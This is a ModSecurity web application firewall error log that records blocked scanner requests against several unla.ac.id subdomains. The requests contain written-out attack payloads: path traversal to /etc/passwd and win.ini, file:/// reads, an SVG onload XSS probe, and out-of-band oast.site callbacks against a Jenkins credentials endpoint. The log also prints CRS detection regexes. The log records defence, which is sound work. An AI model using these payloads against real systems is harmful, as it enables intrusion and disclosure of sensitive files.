[Tue Aug 29 11:36:36.979641 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAATQXoYAAAAO"]
[Tue Aug 29 11:36:37.362283 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111cCo-f0AAAWx8ysAAAAg"]
[Tue Aug 29 11:36:37.366565 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAASEJgAAAAAE"]
[Tue Aug 29 11:36:37.383390 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWx8ywAAAAg"]
[Tue Aug 29 11:36:37.387229 2023] [:error] [pid 1451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWrxqUAAAAY"]
[Tue Aug 29 11:36:37.392733 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAT@Kz8AAAA2"]
[Tue Aug 29 11:36:37.400165 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAShCdEAAAAi"]
[Tue Aug 29 11:36:37.417661 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWx8y0AAAAg"]
[Tue Aug 29 11:36:37.426747 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAASEJgIAAAAE"]
[Tue Aug 29 11:36:37.427798 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWnjhIAAAAT"]
[Tue Aug 29 11:36:37.432231 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWqupwAAAAX"]
[Tue Aug 29 11:36:37.441382 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAATQXooAAAAO"]
[Tue Aug 29 11:36:37.464322 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWexkAAAAAP"]
[Tue Aug 29 11:36:38.380623 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAT@K0MAAAA2"]
[Tue Aug 29 11:36:38.380764 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111sCo-f0AAAWBBQwAAAAB"]
[Tue Aug 29 11:36:38.381355 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAT9PUAAAAA1"]
[Tue Aug 29 11:36:38.387123 2023] [:error] [pid 1456] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAWwdPQAAAAe"]
[Tue Aug 29 11:36:38.397711 2023] [:error] [pid 1423] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAWPpYgAAAAH"]
[Tue Aug 29 11:36:38.398466 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAWvFCEAAAAa"]
[Tue Aug 29 11:36:39.368888 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gx7b9eywa94yjt.oast.site found within TX:1: cjmnbitjmimt14dgn26gx7b9eywa94yjt.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAShCdcAAAAi"]
[Tue Aug 29 11:36:39.375252 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g7weqm4j9r5i8e.oast.site found within TX:1: cjmnbitjmimt14dgn26g7weqm4j9r5i8e.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAASEJgQAAAAE"]
[Tue Aug 29 11:36:39.376411 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g359kbunwcrgnk.oast.site found within TX:1: cjmnbitjmimt14dgn26g359kbunwcrgnk.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAWexkUAAAAP"]
[Tue Aug 29 11:36:39.484139 2023] [:error] [pid 1438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO1118Co-f0AAAWexkkAAAAP"]
[Tue Aug 29 11:36:39.499480 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g4cbnhouqirye3.oast.site found within TX:1: cjmnbitjmimt14dgn26g4cbnhouqirye3.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAShCdwAAAAi"]
[Tue Aug 29 11:36:39.512184 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26ggjsfz9zhgrqjj.oast.site found within TX:1: cjmnbitjmimt14dgn26ggjsfz9zhgrqjj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAWnjiQAAAAT"]
[Tue Aug 29 11:36:40.522870 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gzgfohsy3gi5nn.oast.site found within TX:1: cjmnbitjmimt14dgn26gzgfohsy3gi5nn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO112MCo-f0AAAWx8z8AAAAg"]
[Tue Aug 29 11:36:41.399116 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAAN5YLkAAAAN"]
[Tue Aug 29 11:36:41.399248 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAAW1WZwAAAAD"]
[Tue Aug 29 11:36:41.405149 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAAWlCc8AAAAR"]
[Tue Aug 29 11:36:41.425659 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO112cCo-f0AAAWlCdAAAAAR"]
[Tue Aug 29 11:36:41.442972 2023] [:error] [pid 1278] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAT@K1gAAAA2"]
[Tue Aug 29 11:36:41.464488 2023] [:error] [pid 1445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAWlCdIAAAAR"]
[Tue Aug 29 11:36:41.473535 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAASEJhIAAAAE"]
[Tue Aug 29 11:36:41.476275 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAW51SYAAAAF"]
[Tue Aug 29 11:36:41.485575 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAWquqUAAAAX"]
[Tue Aug 29 11:36:42.357063 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112sCo-f0AAASEJhQAAAAE"]
[Tue Aug 29 11:36:42.361491 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAWx80kAAAAg"]
[Tue Aug 29 11:36:42.363352 2023] [:error] [pid 889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAN5YL4AAAAN"]
[Tue Aug 29 11:36:42.367304 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAQSWR0AAAA0"]
